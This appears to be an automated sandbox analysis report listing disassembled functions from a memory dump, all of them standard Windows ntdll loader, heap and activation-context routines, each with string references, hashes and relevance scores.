Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 91f7322bbcd81df204d7312f91a9e346976a5e797d89cd7778e92a57dc27d4dd
Instruction ID: 5ded1117ca83d7c7d39e341bd0355025501df15bec573e7b45e9bc19570d0742
Opcode Fuzzy Hash: 91f7322bbcd81df204d7312f91a9e346976a5e797d89cd7778e92a57dc27d4dd
Instruction Fuzzy Hash: 8C3106B16443069BC324EB29DC49E2AF7E4EF94B20F04455CF9855B399E670ED04C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0172096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01722DF0: LdrInitializeThunk.NTDLL ref: 01722DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01720BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01720BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01720D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01720D74

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 31bb38ec87174f6567a5394b8dc49b01ea3e57a319ac2dd1ef589ae6d3c0aa98
Instruction ID: 56f805d00bc7e426d24244a583dceae62e55092098d92db2b8472a8012462d82
Opcode Fuzzy Hash: 31bb38ec87174f6567a5394b8dc49b01ea3e57a319ac2dd1ef589ae6d3c0aa98
Instruction Fuzzy Hash: 00427C71900715DFDB61CF28C884BAAB7F5FF48314F0445AAE989DB245E770AA85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 016EA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

6, xrefs: 016EA3F7
LdrResFallbackLangList Exit, xrefs: 016EA3FF
LdrResFallbackLangList Enter, xrefs: 016EA3EF
8, xrefs: 016EA3E7

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: e12d604c3e92369e0e3662bb572feda7979e06dcdc76c95f4cf6834beb2d02ea
Instruction ID: 6fef69ba39a27c064d9437d416f1384d8e423eeda5fdf3f4464fe02b7557ec0d
Opcode Fuzzy Hash: e12d604c3e92369e0e3662bb572feda7979e06dcdc76c95f4cf6834beb2d02ea
Instruction Fuzzy Hash: 3AC18C7510A382CFD711CF98C848B6AB7E4BF84704F048A6EF9958B391E734C94ACB56

Uniqueness

Uniqueness Score: -1.00%

Function 01718402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 01718422
minkernel\ntdll\ldrinit.c, xrefs: 01718421
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0171855E
@, xrefs: 01718591

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 3b371ec557b802b0e254214435d7bb8703f8e2d5c2e3f22363f91cb6e945fee1
Instruction ID: 924f545a797b93d8091a9b50e1726454976352d683189f9c31b458bca6a06d03
Opcode Fuzzy Hash: 3b371ec557b802b0e254214435d7bb8703f8e2d5c2e3f22363f91cb6e945fee1
Instruction Fuzzy Hash: 73918771548345AFE721DF29CC80FABFBE8EB84684F40092EFA8496155E774D9448B62

Uniqueness

Uniqueness Score: -1.00%

Function 0171273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

.Local, xrefs: 017128D8
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017522B6
SXS: %s() passed the empty activation context, xrefs: 017521DE
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017521D9, 017522B1

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 6c299e0c0d574603025c16a080b30a7fb84c8334ef555fcd44e0bdd95127314c
Instruction ID: 35af940c9680434c5b5d88c53df992791e90011951c42eac44dce57185323eb6
Opcode Fuzzy Hash: 6c299e0c0d574603025c16a080b30a7fb84c8334ef555fcd44e0bdd95127314c
Instruction Fuzzy Hash: 27A19A3590422ADBDB24CF6CCC88BA9F7B1BF58354F2541E9D908AB256D7709E80CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01714AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

SXS: %s() called with invalid flags 0x%08lx, xrefs: 0175342A
SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01753456
SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01753437
RtlDeactivateActivationContext, xrefs: 01753425, 01753432, 01753451

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: 65948c64eb2585613ff84f3bcf075cd5e17d8ebab12abde7119532ab2d167582
Instruction ID: cdf996a91df96efae83da119c8702653199a88b5bed4918e70d75375deca8220
Opcode Fuzzy Hash: 65948c64eb2585613ff84f3bcf075cd5e17d8ebab12abde7119532ab2d167582
Instruction Fuzzy Hash: 6C6100326007129BD7228F1DC841B3AFBE5FF80B90F15856DE9569B255CBB0E801CB95

Uniqueness

Uniqueness Score: -1.00%

Function 016E64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01740FE5
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0174106B
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01741028
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017410AE

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 28b79a515176afece8d66d033622df683d2e2b9f9ace3486d371ef63063fa94f
Instruction ID: c8e08f11e8a2d6bf890d8f36c734933e900bdf9daf0a12193508f94b2a5cc763
Opcode Fuzzy Hash: 28b79a515176afece8d66d033622df683d2e2b9f9ace3486d371ef63063fa94f
Instruction Fuzzy Hash: BA71B171A053159FCB21DF14CC88B9BBBE8AF64754F400568F9498B24AD734D589CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 01714D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 01753640, 0175366C
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0175362F
LdrpFindDllActivationContext, xrefs: 01753636, 01753662
Querying the active activation context failed with status 0x%08lx, xrefs: 0175365C

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: ad34553e90c7c2c19cd619e8273081f4ba8ff10307c612ae0e0d1695e638a640
Instruction ID: 5726ba27dfbf87bd51912287cfe75abc24443ed644eaef2b6e92ae22afbb21cd
Opcode Fuzzy Hash: ad34553e90c7c2c19cd619e8273081f4ba8ff10307c612ae0e0d1695e638a640
Instruction Fuzzy Hash: 91316E32900211AADF32AB1CDC89B35F6B4FB01764F86806EEB8B57259D7A09CC083D1

Uniqueness

Uniqueness Score: -1.00%

Function 0170245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

apphelp.dll, xrefs: 01702462
minkernel\ntdll\ldrinit.c, xrefs: 0174A9A2
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0174A992
LdrpDynamicShimModule, xrefs: 0174A998

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 0618f89f35c91a25dce9a1d6c7f0e666acfede1e81946fa88d0fbf9e616c6aad
Instruction ID: 60c149fae93779d1b66e80ad220575e37b51918eea3dd30c8bec5121bdeccc22
Opcode Fuzzy Hash: 0618f89f35c91a25dce9a1d6c7f0e666acfede1e81946fa88d0fbf9e616c6aad
Instruction Fuzzy Hash: 9C3148B6681306EBDB319F5DCC85A7AFBB5FB84B20F16405DF90267245C7705981CB90

Uniqueness

Uniqueness Score: -1.00%

Function 016F29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 016F327D
HEAP[%wZ]: , xrefs: 016F3255
HEAP: , xrefs: 016F3264

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: f1f5dd11d791157a3ae63acd1b0809f835dc931fc140df2f35a82072f21cfeac
Instruction ID: c4c7ef644c3b86a79ae2574f1b76d07bd545d663944d46c27dd81ff407a53b37
Opcode Fuzzy Hash: f1f5dd11d791157a3ae63acd1b0809f835dc931fc140df2f35a82072f21cfeac
Instruction Fuzzy Hash: 9492CC71A042499FDB25CF68C8547AEBBF1FF48304F18809DEA4AAB391D735A946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 016F0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 017450AE
HEAP: , xrefs: 017450BD
(UCRBlock->Size >= *Size), xrefs: 017450CA

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 5f4af3c2741fdf256b22de13a2ba21f0864c3a37029cdd794a311cde2279514e
Instruction ID: e58cc8858832d02eb555927b6910f2e190fa656d658602653ae7d8621de497b2
Opcode Fuzzy Hash: 5f4af3c2741fdf256b22de13a2ba21f0864c3a37029cdd794a311cde2279514e
Instruction Fuzzy Hash: 18F19C74A00606DFEB25CF68C884B6AB7B6FF45304F1481ADF6169B396D734E981CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01706962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

, xrefs: 0174CA51
@, xrefs: 01706C24

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID: InitializeThunk
String ID: $@
API String ID: 2994545307-1077428164
Opcode ID: 8a3d82abf156164358244fec2de926d696db18b4d67c4182674b10b7900f5595
Instruction ID: 6ee93d2879db8aa9843f30113d39d607a47e2cb4c0397baf33ea218acf9d3509
Opcode Fuzzy Hash: 8a3d82abf156164358244fec2de926d696db18b4d67c4182674b10b7900f5595
Instruction Fuzzy Hash: BEC25C71609341DFE72ACF28C841BABFBE5AB88754F04896DF9C987281D734E845CB52

Uniqueness

Uniqueness Score: -1.00%

Function 016DA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

UseFilter, xrefs: 016DA1C1
FilterFullPath, xrefs: 0173C2E6
\??\, xrefs: 0173C1E4

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 438ef3ce45246b3af53ea57df98a7a568ed36618c1c454d17b8499962bc895ee
Instruction ID: ff2148bcae164d1edda547ae5c2e81587159cb2d93168ebf970a4d0ca9f9ae56
Opcode Fuzzy Hash: 438ef3ce45246b3af53ea57df98a7a568ed36618c1c454d17b8499962bc895ee
Instruction Fuzzy Hash: 98A16D719112299BDB32DF68CC88BEAF7B8EF44710F1041EAE909A7251D7359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01700BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

Failed to allocated memory for shimmed module list, xrefs: 0174A10F
LdrpCheckModule, xrefs: 0174A117
minkernel\ntdll\ldrinit.c, xrefs: 0174A121

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: 051061ac130dd333138d29033a3a0f15f6e3a8b987655ee875b8b740c2465f45
Instruction ID: 525516d5bc3f8815f060b969bb8ba452bc0d2813ffbda46076826e1762bef29f
Opcode Fuzzy Hash: 051061ac130dd333138d29033a3a0f15f6e3a8b987655ee875b8b740c2465f45
Instruction Fuzzy Hash: CE71DE70A4030ADFDB26DF68C985BBEF7F5FB44224F14806DE906A7255E734A981CB50

Uniqueness

Uniqueness Score: -1.00%

Function 016F0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01745335
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 0174534D
HEAP: , xrefs: 01745342

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: f4dfc767f4670a1b394b89e1db443b259974611d49c4c498be299ea32e3ffa6e
Instruction ID: 817aad8ba223592562f7502c9e32fac327379a627013f152d816e5023eb8a5e3
Opcode Fuzzy Hash: f4dfc767f4670a1b394b89e1db443b259974611d49c4c498be299ea32e3ffa6e
Instruction Fuzzy Hash: 33619C706003059FDB29CF28C984B6ABBE2FF45708F14855DE95A8F296D771E881CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0171C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 017582E8
Failed to reallocate the system dirs string !, xrefs: 017582D7
LdrpInitializePerUserWindowsDirectory, xrefs: 017582DE

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: 700ba534a3f7d5f39dd38997ab9a5cf5e202968034b113aa5394eb09de3feba9
Instruction ID: 42a254110063c3b22aef8d4d55c2e4b64df3de54d075f4dc1d9c5a4182cdaaa7
Opcode Fuzzy Hash: 700ba534a3f7d5f39dd38997ab9a5cf5e202968034b113aa5394eb09de3feba9
Instruction Fuzzy Hash: 2441E671545305ABD722EBA8DC45B5BBBF8EF44760F00852EFA45D3294E7B0D800CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0179C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0179C1C5
PreferredUILanguages, xrefs: 0179C212
@, xrefs: 0179C1F1

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: d22b01606314a2e35c8106abae71243cfa8f40d12c7b441334219a3e98f8531f
Instruction ID: a2b071121eaed23c80744f350cdb5a9b4d235e3fe4e80c987f9557fde58ee71a
Opcode Fuzzy Hash: d22b01606314a2e35c8106abae71243cfa8f40d12c7b441334219a3e98f8531f
Instruction Fuzzy Hash: 12418371E04219EBDF12DBD8D851FEEFBB9AB18700F1040AAE605B7280D7749A49CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01774144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Enter, xrefs: 01774160
LdrpResValidateFilePath Exit, xrefs: 01774172
@, xrefs: 01774225

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 949415c80ba3cb86d539657d8f7a6a5424b5d0142b9c813c766e9742418fbbf3
Instruction ID: 531413a24c7ed766f36e9e60eb5942c8cd2d94345f9dcb0754098531dd5c964e
Opcode Fuzzy Hash: 949415c80ba3cb86d539657d8f7a6a5424b5d0142b9c813c766e9742418fbbf3
Instruction Fuzzy Hash: 2B41EF72A046598BEF26EBA9DC44BADFBB9FF55340F14045ADA02AB791D6348901CB10

Uniqueness

Uniqueness Score: -1.00%

Function 01764755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 01764899
LdrpCheckRedirection, xrefs: 0176488F
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01764888

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: 0db8bf3b11ee67fff435f8b525e47acf5277bb0a1a87a2ef04152fd7cb01996a
Instruction ID: 220c2847368c9531bd08448dee1fa93835d8465d1e51cc0d89959ce0a1fc3ba8
Opcode Fuzzy Hash: 0db8bf3b11ee67fff435f8b525e47acf5277bb0a1a87a2ef04152fd7cb01996a
Instruction Fuzzy Hash: CF41E232A452568FCB21CE6CD940A26FBECEF8A660F06056DED4AD7351D730D800CB81

Uniqueness

Uniqueness Score: -1.00%

Function 016F0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01745431
HEAP: , xrefs: 0174543E
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01745449

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 4d2a13d536ae4803a1cae2be93e9b8036f3616e8519768b0e1a163e5adc88da2
Instruction ID: 1be3a29696b824f93f14d30fee3e65d6ae6bae9cdf07685a0c1769f6bd15df45
Opcode Fuzzy Hash: 4d2a13d536ae4803a1cae2be93e9b8036f3616e8519768b0e1a163e5adc88da2
Instruction Fuzzy Hash: 9211CA313161469FDB29CA18CC84B6AF3A6AF41A26F18816EF506CF256DB30E881C754

Uniqueness

Uniqueness Score: -1.00%

Function 017620DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

LdrpInitializationFailure, xrefs: 017620FA
Process initialization failed with status 0x%08lx, xrefs: 017620F3
minkernel\ntdll\ldrinit.c, xrefs: 01762104

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: fdec3a35ca9f26fe299a3fd7c2e201aecab109e5c788ca7b1846ab22bdc21499
Instruction ID: 9382ecac2d0ca1f8f0a671586b161db9c85878f5cbbfc2d7f994ceb07d67db6f
Opcode Fuzzy Hash: fdec3a35ca9f26fe299a3fd7c2e201aecab109e5c788ca7b1846ab22bdc21499
Instruction Fuzzy Hash: 36F0C875641309ABE724E64CCC5AFAAB77CEB40B64F51005DFE0577286D6F0AA40CA91

Uniqueness

Uniqueness Score: -1.00%

Function 016F03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01744D8A

Strings

#%u, xrefs: 01744D82

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 26401fd580f80d6469f7f3b1d587e77d36a86c878d2de5b881a30805d7ade312
Instruction ID: 1ad8f9b5d5c987d4781f4d37735d6f2cdbb50ca4ad5c7fa582244c50f4a329df
Opcode Fuzzy Hash: 26401fd580f80d6469f7f3b1d587e77d36a86c878d2de5b881a30805d7ade312
Instruction Fuzzy Hash: 45713972A0114A9FDB11DFA8C994BAEBBF9FF08704F144069EA05E7251EB34ED41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 016EA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Exit, xrefs: 016EAA25
LdrResSearchResource Enter, xrefs: 016EAA13

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: c12efe62887b6ff187b9dcf91ad45880ecacc0a8733a1483735dadb69961c26e
Instruction ID: 9b5cfcc4d78bc5b092e6cc37b6b22619f8bfbee83b12f90840220aca326b4ce0
Opcode Fuzzy Hash: c12efe62887b6ff187b9dcf91ad45880ecacc0a8733a1483735dadb69961c26e
Instruction Fuzzy Hash: 67E17071E01219ABEF22CEDCDD88BAEBBBABF54310F14466AF901E7251D7349941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 017AA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 017AA551
`, xrefs: 017AA44B

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: ce2952a5fc496981435f2aee5c153d863bc78e5a28dffdb1264b76618ac9dcee
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 18C1BD312043429BEB25CF28C845B6BFBE6AFC4318F584B2DF6968B291D774D505CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0175E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 0175E751
Legacy, xrefs: 0175E75A

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 628bba13edd8b61be51b83a4d105ac2d0e4c1db63e61df8d7c27eabbc9e1928e
Instruction ID: eed500e9771bafdd534b315b51f169c3248941f065d7fbd1ab4ef509c0d7ccac
Opcode Fuzzy Hash: 628bba13edd8b61be51b83a4d105ac2d0e4c1db63e61df8d7c27eabbc9e1928e
Instruction Fuzzy Hash: A2617C72E403199FDB64DFA8C940BAEFBB5FB48700F14446DEA49EB241DB71AA40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 017843D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

MUI, xrefs: 01784525
@, xrefs: 01784437

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: 765c221a44d18d314e5c953e8141cdb5063cc9d22da52ab89f99c909aab52db5
Instruction ID: 2963cdf86bbb580013dee0d70ce3653d16655b283d69cf9700edfeb616def115
Opcode Fuzzy Hash: 765c221a44d18d314e5c953e8141cdb5063cc9d22da52ab89f99c909aab52db5
Instruction Fuzzy Hash: 3D513771E4021EAEDF11DFA9CC84FEEFBB9EB14754F100529E611B7290D6709A05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 016E04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

kLsE, xrefs: 016E0540
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 016E063D

Memory Dump Source

